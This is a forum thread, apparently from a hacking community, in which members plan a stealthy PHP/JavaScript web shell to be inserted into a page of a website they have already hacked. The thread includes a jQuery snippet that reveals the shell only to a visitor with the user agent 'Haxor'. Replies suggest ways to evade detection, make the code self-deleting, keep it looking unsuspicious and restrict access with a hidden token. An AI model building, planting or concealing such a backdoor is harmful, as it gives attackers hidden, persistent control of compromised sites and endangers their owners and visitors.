Building a PHP shell, come join me!

shell
phpshell
stealth
javascript

#1

Hello peepz,

Been a while since I last posted something.
Have been very busy with ma study Computer Science which I started this year.

Anyway:

A few days ago my dummie book: ‘HTML5, CSS, JavaScript, PHP and MySQL for Dummies’.
So I’ve gone trough most of the book now and decided it was time to write a PHP + JavaScript shell.
I opened a GitHub repo which can be found here:
EDIT:
https://git.0x00sec.org/unh0lys0da/PHPshell/tree/master

So if anyone wants to help me, please go ahead!
The idea is as following:

This piece of code is inserted in a normal page of the website you hacked.
Ofcourse the page should be one that doesn’t create too much traffic.
Now the idea is that it checks the useragent of the visitor.
As you can see here:

        if( navigator.userAgent == "Haxor" ) {
            $("#haxored").prop("hidden",false);
            $("#luserContent").prop("hidden",true):
        }

This way, users with normal useragents (for example people browsing with firefox) don’t see the shell.
But if you set your useragent string in your browser as “Haxor” you can see the shell!

Now this is only the beginning of the code, all parts are yet unfinished.

If anyone feels like working on this project, please let me know!

IoTh1nkN0t (Previously unh0lys0da)

Update:

This is how the shell looks now:

@pry0cc You do real MVP


(Command-Line Ninja) #2

That is a boss idea! I’m getting in on that.

How would you allow it to avoid detection? Perhaps get the javascript code to delete itself? You would need jquery…


#3

It’s already got jQuery ^^
Eehm ye well if you look at the source of the webpage, you’ll no matter what find that the page was not the original.
But you could do it with PHP

Hmm that poses a real challenge


(Command-Line Ninja) #4

I’ve just got it. Docker doesn’t seem to be working on my local box so I need to get that sorted to test it out.


(Command-Line Ninja) #5

Grazia IO! What’s next?


(zusheng-security) #6

hello,this is a good porject,I hope join.Do you know Github?


(Command-Line Ninja) #7

We have our own gitlab server. You can find that in the link provided in the article.


(zusheng-security) #8

Sorry,I did not see, thank you.


(Burning away in an Explosion) #9

There is a PHP function named get_browser for it. Everything else out of serverbased wouldn’t make sensce. Not that big challenge, but ok :smile:


(3,4,5-trimethoxyphenethylamine) #10

I’ve just seen your code and I think you should make the most server sided you can. You’re relying on javascript to do most of the work which make it hackable. If you need something just text me.


( X2tf) #11

We are having shell acess here, which means we have already hacked the site, We have to make it more client side to make it look less suspicious. (You did’t want to add files that can conform your attack. Did’t you :stuck_out_tongue_winking_eye: )


(Command-Line Ninja) #12

Firstly. We are not relying on JavaScript to do most of the work. We have a backend (PHP), to do server side functions, and then the front-end (JavaScript) to do client side functions.

The compartmentalisation is sound. Since it’s using the backend as an API it would be possible to write a CLI client for it. Heck. Write an iPhone app. All it has to do is call the PHP script with a get request.

Secondly, @_k_h is 100% correct. It’s a shell xD therefore you aren’t going to gain much by hacking it. In fact. You won’t gain anything. If you could hack it for more functionality we would actually impliment those features into the shell :joy:


(3,4,5-trimethoxyphenethylamine) #13

I didn’t though of that from that prespective, I guess you’re kinda right.


#14

Hi, I would like to help you on this project. It looks very interesting. I also have few ideas for you. Maybe you should use native XHR api for issuing requests from client side. You use jQuery in your code from third party CDN for building only one request. Also, you can set some kind of a hard coded md5 token in PHP doc comment. You can then send string/word in authorization header from client. On server side you hash that word with md5 and compare with token in PHP doc using reflection. This way you are implemented single-factor authentication and only you can use shell. Tell me what you think about my ideas.


(Command-Line Ninja) #15

That’s a very good idea. In fact, that’s miles ahead of the user agent idea.

If you’d like to implement it, fork the repo on Gitlab and then issue a pull request. I’m sure we’ll accept it :slight_smile:


#17